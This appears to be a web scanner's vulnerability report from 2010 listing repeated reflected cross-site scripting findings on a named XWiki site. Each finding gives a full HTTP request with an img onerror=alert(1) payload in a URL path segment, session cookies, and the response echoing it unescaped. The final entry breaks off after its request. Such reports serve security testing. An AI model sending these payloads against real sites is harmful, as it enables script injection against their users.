The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89aa6"><img%20src%3da%20onerror%3dalert(1)>625cf66d6b7 was submitted in the REST URL parameter 5. This input was echoed as 89aa6"><img src=a onerror=alert(1)>625cf66d6b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/WebRss89aa6"><img%20src%3da%20onerror%3dalert(1)>625cf66d6b7 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:18 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12908 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebRss89aa6%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E625cf66d6b7?format=xar&name=Main.WebRss89aa6"><img src=a onerror=alert(1)>625cf66d6b7&pages=Main.WebRss89aa6"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce21f"><img%20src%3da%20onerror%3dalert(1)>527223fb6d6 was submitted in the REST URL parameter 4. This input was echoed as ce21f"><img src=a onerror=alert(1)>527223fb6d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maince21f"><img%20src%3da%20onerror%3dalert(1)>527223fb6d6/WebSearch HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:08 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12963 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Maince21f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E527223fb6d6/WebSearch?format=xar&name=Maince21f"><img src=a onerror=alert(1)>527223fb6d6.WebSearch&pages=Maince21f"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5df85<img%20src%3da%20onerror%3dalert(1)>8a2f5dddb89 was submitted in the REST URL parameter 4. This input was echoed as 5df85<img src=a onerror=alert(1)>8a2f5dddb89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main5df85<img%20src%3da%20onerror%3dalert(1)>8a2f5dddb89/WebSearch HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:04 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12897 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main5df85%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8a2f5dddb89/">Main5df85<img src=a onerror=alert(1)>8a2f5dddb89</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f4e0<img%20src%3da%20onerror%3dalert(1)>60a04462bbb was submitted in the REST URL parameter 5. This input was echoed as 5f4e0<img src=a onerror=alert(1)>60a04462bbb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/WebSearch5f4e0<img%20src%3da%20onerror%3dalert(1)>60a04462bbb HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:41 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12885 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch5f4e0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E60a04462bbb'>WebSearch5f4e0<img src=a onerror=alert(1)>60a04462bbb</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9111c"><img%20src%3da%20onerror%3dalert(1)>864bc9e0d28 was submitted in the REST URL parameter 5. This input was echoed as 9111c"><img src=a onerror=alert(1)>864bc9e0d28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/WebSearch9111c"><img%20src%3da%20onerror%3dalert(1)>864bc9e0d28 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:47 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12947 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/WebSearch9111c%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E864bc9e0d28?format=xar&name=Main.WebSearch9111c"><img src=a onerror=alert(1)>864bc9e0d28&pages=Main.WebSearch9111c"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6e09<img%20src%3da%20onerror%3dalert(1)>c2ab2f9a43c was submitted in the REST URL parameter 4. This input was echoed as f6e09<img src=a onerror=alert(1)>c2ab2f9a43c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainf6e09<img%20src%3da%20onerror%3dalert(1)>c2ab2f9a43c/WindowsService HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:33 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12962 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Mainf6e09%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec2ab2f9a43c/">Mainf6e09<img src=a onerror=alert(1)>c2ab2f9a43c</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 924d9"><img%20src%3da%20onerror%3dalert(1)>50183281015 was submitted in the REST URL parameter 4. This input was echoed as 924d9"><img src=a onerror=alert(1)>50183281015 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main924d9"><img%20src%3da%20onerror%3dalert(1)>50183281015/WindowsService HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:58 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13028 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main924d9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E50183281015/WindowsService?format=xar&name=Main924d9"><img src=a onerror=alert(1)>50183281015.WindowsService&pages=Main924d9"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 789b1"><img%20src%3da%20onerror%3dalert(1)>6568bdce5f7 was submitted in the REST URL parameter 5. This input was echoed as 789b1"><img src=a onerror=alert(1)>6568bdce5f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/WindowsService789b1"><img%20src%3da%20onerror%3dalert(1)>6568bdce5f7 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:01 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13012 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/WindowsService789b1%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6568bdce5f7?format=xar&name=Main.WindowsService789b1"><img src=a onerror=alert(1)>6568bdce5f7&pages=Main.WindowsService789b1"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 673bb<img%20src%3da%20onerror%3dalert(1)>0945b5817dd was submitted in the REST URL parameter 5. This input was echoed as 673bb<img src=a onerror=alert(1)>0945b5817dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/WindowsService673bb<img%20src%3da%20onerror%3dalert(1)>0945b5817dd HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:52 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12950 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService673bb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E0945b5817dd'>WindowsService673bb<img src=a onerror=alert(1)>0945b5817dd</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126ea"><img%20src%3da%20onerror%3dalert(1)>218d536e8de was submitted in the REST URL parameter 4. This input was echoed as 126ea"><img src=a onerror=alert(1)>218d536e8de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki126ea"><img%20src%3da%20onerror%3dalert(1)>218d536e8de/Admin HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:42 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12924 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/XWiki126ea%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E218d536e8de/Admin?format=xar&name=XWiki126ea"><img src=a onerror=alert(1)>218d536e8de.Admin&pages=XWiki126ea"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1323f<img%20src%3da%20onerror%3dalert(1)>ed793d6b7ca was submitted in the REST URL parameter 4. This input was echoed as 1323f<img src=a onerror=alert(1)>ed793d6b7ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki1323f<img%20src%3da%20onerror%3dalert(1)>ed793d6b7ca/Admin HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:21 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12858 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/XWiki1323f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eed793d6b7ca/">XWiki1323f<img src=a onerror=alert(1)>ed793d6b7ca</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 849fa<img%20src%3da%20onerror%3dalert(1)>8082881189 was submitted in the REST URL parameter 5. This input was echoed as 849fa<img src=a onerror=alert(1)>8082881189 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki/Admin849fa<img%20src%3da%20onerror%3dalert(1)>8082881189 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:41 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12833 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin849fa%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8082881189'>Admin849fa<img src=a onerror=alert(1)>8082881189</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a623"><img%20src%3da%20onerror%3dalert(1)>31c99b72496 was submitted in the REST URL parameter 5. This input was echoed as 1a623"><img src=a onerror=alert(1)>31c99b72496 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki/Admin1a623"><img%20src%3da%20onerror%3dalert(1)>31c99b72496 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:54 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12908 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/Admin1a623%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E31c99b72496?format=xar&name=XWiki.Admin1a623"><img src=a onerror=alert(1)>31c99b72496&pages=XWiki.Admin1a623"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90042<img%20src%3da%20onerror%3dalert(1)>f4f08861abe was submitted in the REST URL parameter 4. This input was echoed as 90042<img src=a onerror=alert(1)>f4f08861abe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWiki90042<img%20src%3da%20onerror%3dalert(1)>f4f08861abe/JaneZupan HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:08 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12910 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/XWiki90042%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef4f08861abe/">XWiki90042<img src=a onerror=alert(1)>f4f08861abe</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febcb"><img%20src%3da%20onerror%3dalert(1)>50bdafe04d3 was submitted in the REST URL parameter 4. This input was echoed as febcb"><img src=a onerror=alert(1)>50bdafe04d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/XWikifebcb"><img%20src%3da%20onerror%3dalert(1)>50bdafe04d3/JaneZupan HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
